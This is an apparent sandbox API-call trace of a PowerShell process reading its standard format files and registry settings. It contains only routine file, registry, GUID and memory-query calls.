	[0278.773] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x70022f61, Data2=0xdde5, Data3=0x4745, Data4=([0]=0x94, [1]=0x72, [2]=0x8, [3]=0xa5, [4]=0x62, [5]=0x82, [6]=0x14, [7]=0x11))) returned 0x0
	[0278.773] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x3c1a1dd6, Data2=0x44c1, Data3=0x46ca, Data4=([0]=0x8f, [1]=0xe, [2]=0x1c, [3]=0x39, [4]=0x73, [5]=0xd3, [6]=0xbe, [7]=0x51))) returned 0x0
	[0278.774] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0278.774] SetErrorMode (uMode=0x1) returned 0x1
	[0278.774] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1cc
	[0278.774] GetFileType (hFile=0x1cc) returned 0x1
	[0278.774] SetErrorMode (uMode=0x1) returned 0x1
	[0278.774] GetFileType (hFile=0x1cc) returned 0x1
	[0278.774] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.775] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.775] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.775] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.776] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.776] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.776] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.776] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.777] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.777] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.778] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.778] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.778] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.778] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.779] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.779] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.780] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.780] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0xbce, lpOverlapped=0x0) returned 1
	[0278.780] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a586e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a586e*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0278.781] ReadFile (in: hFile=0x1cc, lpBuffer=0x33a6138, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x33a6138*, lpNumberOfBytesRead=0x20ccf8*=0x0, lpOverlapped=0x0) returned 1
	[0278.781] CloseHandle (hObject=0x1cc) returned 1
	[0278.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0278.781] SetErrorMode (uMode=0x1) returned 0x1
	[0278.781] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20cca0 | out: lpFileInformation=0x20cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0278.781] SetErrorMode (uMode=0x1) returned 0x1
	[0278.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0278.782] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20cd88 | out: phkResult=0x20cd88*=0x1cc) returned 0x0
	[0278.782] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20cd0c, lpData=0x0, lpcbData=0x20cd08*=0x0 | out: lpType=0x20cd0c*=0x1, lpData=0x0, lpcbData=0x20cd08*=0x56) returned 0x0
	[0278.782] CoTaskMemAlloc (cb=0x5a) returned 0x1b785d20
	[0278.782] RegQueryValueExW (in: hKey=0x1cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20ccdc, lpData=0x1b785d20, lpcbData=0x20ccd8*=0x56 | out: lpType=0x20ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20ccd8*=0x56) returned 0x0
	[0278.782] CoTaskMemFree (pv=0x1b785d20) 
	[0278.782] RegCloseKey (hKey=0x1cc) returned 0x0
	[0278.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0278.782] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0283.145] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xf7fdcbf6, Data2=0x3b84, Data3=0x4b03, Data4=([0]=0xab, [1]=0x5f, [2]=0x28, [3]=0x15, [4]=0x84, [5]=0x91, [6]=0x7d, [7]=0x93))) returned 0x0
	[0283.151] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x9dd3568a, Data2=0x2563, Data3=0x422a, Data4=([0]=0x9b, [1]=0x68, [2]=0xcb, [3]=0x4, [4]=0x7d, [5]=0x4c, [6]=0x82, [7]=0x6d))) returned 0x0
	[0283.151] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x8cb3acf3, Data2=0xf0cf, Data3=0x4c3d, Data4=([0]=0xb5, [1]=0xe4, [2]=0x62, [3]=0xd8, [4]=0xb4, [5]=0x22, [6]=0x37, [7]=0xdc))) returned 0x0
	[0283.151] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x1da2e8a0, Data2=0xc39e, Data3=0x4f49, Data4=([0]=0x98, [1]=0x6d, [2]=0xeb, [3]=0x68, [4]=0x45, [5]=0xff, [6]=0x2d, [7]=0xad))) returned 0x0
	[0283.151] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x717415cb, Data2=0xd60e, Data3=0x48b1, Data4=([0]=0x96, [1]=0x5f, [2]=0xf7, [3]=0x74, [4]=0x95, [5]=0xa0, [6]=0xb4, [7]=0x86))) returned 0x0
	[0283.152] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xb85b7d7a, Data2=0x8167, Data3=0x48ce, Data4=([0]=0x93, [1]=0xca, [2]=0xa7, [3]=0x54, [4]=0x35, [5]=0x2b, [6]=0x51, [7]=0x9a))) returned 0x0
	[0283.152] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.155] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x64cb00ff, Data2=0x3d05, Data3=0x45db, Data4=([0]=0x93, [1]=0x7e, [2]=0xcd, [3]=0xae, [4]=0x6d, [5]=0xf3, [6]=0x48, [7]=0xda))) returned 0x0
	[0283.155] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.156] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0283.156] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xaeec436e, Data2=0x5dd2, Data3=0x4d57, Data4=([0]=0xa4, [1]=0x96, [2]=0x49, [3]=0x67, [4]=0xe1, [5]=0xfb, [6]=0x78, [7]=0xd0))) returned 0x0
	[0283.156] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xbcdd3cdc, Data2=0x8065, Data3=0x4a20, Data4=([0]=0x99, [1]=0x3e, [2]=0x6f, [3]=0x87, [4]=0x60, [5]=0x8b, [6]=0xaf, [7]=0x76))) returned 0x0
	[0283.156] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xb9b62e19, Data2=0x2a20, Data3=0x43a3, Data4=([0]=0x85, [1]=0xd5, [2]=0x9f, [3]=0x67, [4]=0x56, [5]=0xc7, [6]=0xcb, [7]=0x95))) returned 0x0
	[0283.157] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x511dd91b, Data2=0x7c62, Data3=0x4855, Data4=([0]=0xab, [1]=0x1b, [2]=0xab, [3]=0xe1, [4]=0x1, [5]=0x48, [6]=0x5f, [7]=0x38))) returned 0x0
	[0283.721] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.721] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xe532aa21, Data2=0xf5ed, Data3=0x426c, Data4=([0]=0x93, [1]=0x77, [2]=0x5, [3]=0x18, [4]=0xe, [5]=0x3c, [6]=0x16, [7]=0x75))) returned 0x0
	[0283.721] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.721] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.721] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.721] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.721] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.722] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x389e7157, Data2=0xdc04, Data3=0x47fd, Data4=([0]=0x98, [1]=0x12, [2]=0x3b, [3]=0xa7, [4]=0x7c, [5]=0xc1, [6]=0xed, [7]=0x6b))) returned 0x0
	[0283.722] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x47b1c18d, Data2=0xba09, Data3=0x489f, Data4=([0]=0xbe, [1]=0x13, [2]=0xc9, [3]=0x5d, [4]=0x65, [5]=0xc1, [6]=0x19, [7]=0xa8))) returned 0x0
	[0283.722] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x6cbeb3e8, Data2=0xe35c, Data3=0x483f, Data4=([0]=0xa1, [1]=0xc7, [2]=0xbd, [3]=0x9, [4]=0x1, [5]=0x7, [6]=0xe8, [7]=0xbf))) returned 0x0
	[0283.722] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xc56e364f, Data2=0x51b6, Data3=0x4da5, Data4=([0]=0xb6, [1]=0xdf, [2]=0x50, [3]=0x16, [4]=0x72, [5]=0xc5, [6]=0x83, [7]=0x7d))) returned 0x0
	[0283.722] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xc7b70b5f, Data2=0x65bc, Data3=0x4943, Data4=([0]=0xb5, [1]=0xb3, [2]=0x4c, [3]=0xf, [4]=0x59, [5]=0x24, [6]=0x48, [7]=0x72))) returned 0x0
	[0283.722] VirtualQuery (in: lpAddress=0x20bc20, lpBuffer=0x20cae0, dwLength=0x30 | out: lpBuffer=0x20cae0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.723] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x484328d4, Data2=0x56ea, Data3=0x4f75, Data4=([0]=0xbd, [1]=0xba, [2]=0x31, [3]=0xd4, [4]=0xff, [5]=0x29, [6]=0xc6, [7]=0x9))) returned 0x0
	[0283.723] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x742d926c, Data2=0x25de, Data3=0x4aec, Data4=([0]=0x99, [1]=0x83, [2]=0x49, [3]=0x59, [4]=0x29, [5]=0x36, [6]=0xe0, [7]=0xee))) returned 0x0
	[0283.723] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x8c0b97a3, Data2=0xe728, Data3=0x4827, Data4=([0]=0x8b, [1]=0xe0, [2]=0x4b, [3]=0xe1, [4]=0xec, [5]=0xd8, [6]=0x50, [7]=0x23))) returned 0x0
	[0283.723] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xf677b7, Data2=0x3419, Data3=0x4320, Data4=([0]=0xac, [1]=0xf0, [2]=0x4e, [3]=0x8d, [4]=0xf9, [5]=0xeb, [6]=0xc3, [7]=0x9a))) returned 0x0
	[0283.723] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x2c1ab0eb, Data2=0x6f51, Data3=0x45f4, Data4=([0]=0x98, [1]=0x54, [2]=0xb1, [3]=0x8f, [4]=0x73, [5]=0xc4, [6]=0xe4, [7]=0xf2))) returned 0x0
	[0283.723] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xa722977a, Data2=0xce2f, Data3=0x4f4e, Data4=([0]=0x8e, [1]=0xf6, [2]=0xf, [3]=0x5f, [4]=0xcd, [5]=0x88, [6]=0x58, [7]=0xec))) returned 0x0
	[0283.724] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xc95195a5, Data2=0x2dc2, Data3=0x43ec, Data4=([0]=0xa4, [1]=0xf7, [2]=0xeb, [3]=0x40, [4]=0xc1, [5]=0xf3, [6]=0x7d, [7]=0x39))) returned 0x0
	[0283.724] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x8a65b331, Data2=0x28a3, Data3=0x4811, Data4=([0]=0xb9, [1]=0x98, [2]=0x50, [3]=0xed, [4]=0x45, [5]=0xb9, [6]=0x97, [7]=0xec))) returned 0x0
	[0283.724] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x919c3eae, Data2=0x826a, Data3=0x45fa, Data4=([0]=0x8e, [1]=0x6, [2]=0xd5, [3]=0xa, [4]=0x63, [5]=0xe2, [6]=0xe0, [7]=0xd8))) returned 0x0
	[0283.724] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xb3ce914d, Data2=0x8aa9, Data3=0x4257, Data4=([0]=0x9f, [1]=0x8b, [2]=0x7f, [3]=0x50, [4]=0xb4, [5]=0x1f, [6]=0xc8, [7]=0x69))) returned 0x0
	[0283.724] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x882671e4, Data2=0x41bf, Data3=0x4b93, Data4=([0]=0x85, [1]=0xe, [2]=0x88, [3]=0x51, [4]=0x2a, [5]=0xa9, [6]=0x27, [7]=0xfa))) returned 0x0
	[0283.724] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x100a1fe4, Data2=0xf634, Data3=0x4262, Data4=([0]=0x92, [1]=0x51, [2]=0x5d, [3]=0xa, [4]=0xb1, [5]=0xf3, [6]=0x18, [7]=0x71))) returned 0x0
	[0283.725] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xd23ee58d, Data2=0xb44e, Data3=0x4508, Data4=([0]=0xb6, [1]=0xf3, [2]=0x5, [3]=0xe8, [4]=0xd7, [5]=0xd3, [6]=0xa1, [7]=0xb3))) returned 0x0
	[0283.725] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x5b740fd6, Data2=0xef5e, Data3=0x482b, Data4=([0]=0x9b, [1]=0xd5, [2]=0xc0, [3]=0x47, [4]=0x5f, [5]=0xc, [6]=0x35, [7]=0xc1))) returned 0x0
	[0283.725] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xb0db2cca, Data2=0x25d1, Data3=0x4bb0, Data4=([0]=0xb8, [1]=0x5b, [2]=0x3e, [3]=0x3e, [4]=0xf1, [5]=0x53, [6]=0xf, [7]=0x9c))) returned 0x0
	[0283.725] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xb68e233e, Data2=0xd72c, Data3=0x4e7d, Data4=([0]=0xbd, [1]=0x47, [2]=0x9, [3]=0xc8, [4]=0x11, [5]=0xd2, [6]=0xf5, [7]=0x35))) returned 0x0
	[0283.725] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0xcd0e8a9, Data2=0x5fa5, Data3=0x4b95, Data4=([0]=0xb9, [1]=0x1f, [2]=0xda, [3]=0xc6, [4]=0x63, [5]=0x15, [6]=0xeb, [7]=0x8a))) returned 0x0
	[0283.725] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x7d711c5e, Data2=0xe575, Data3=0x4420, Data4=([0]=0xb1, [1]=0x16, [2]=0x81, [3]=0xb9, [4]=0xb1, [5]=0xa3, [6]=0xa2, [7]=0xfc))) returned 0x0
	[0283.726] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x3e5f2c12, Data2=0xa62e, Data3=0x47de, Data4=([0]=0xad, [1]=0xd0, [2]=0xcc, [3]=0x93, [4]=0x21, [5]=0xa8, [6]=0x2f, [7]=0x70))) returned 0x0
	[0283.726] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.726] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.726] VirtualQuery (in: lpAddress=0x20b960, lpBuffer=0x20c820, dwLength=0x30 | out: lpBuffer=0x20c820*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.726] CoCreateGuid (in: pguid=0x20cfb0 | out: pguid=0x20cfb0*(Data1=0x37bd61b5, Data2=0xf670, Data3=0x427f, Data4=([0]=0x9f, [1]=0xba, [2]=0xa8, [3]=0xa9, [4]=0xab, [5]=0xa, [6]=0x15, [7]=0xd4))) returned 0x0
	[0283.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20c770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.727] SetErrorMode (uMode=0x1) returned 0x1
	[0283.727] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0283.727] GetFileType (hFile=0x1c4) returned 0x1
	[0283.727] SetErrorMode (uMode=0x1) returned 0x1
	[0283.727] GetFileType (hFile=0x1c4) returned 0x1
	[0283.727] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d618c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2d618c8*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.727] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d618c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2d618c8*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.728] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d618c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2d618c8*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.728] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d618c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2d618c8*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
	[0283.728] ReadFile (in: hFile=0x1c4, lpBuffer=0x2d618c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20ccf8, lpOverlapped=0x0 | out: lpBuffer=0x2d618c8*, lpNumberOfBytesRead=0x20ccf8*=0x1000, lpOverlapped=0x0) returned 1
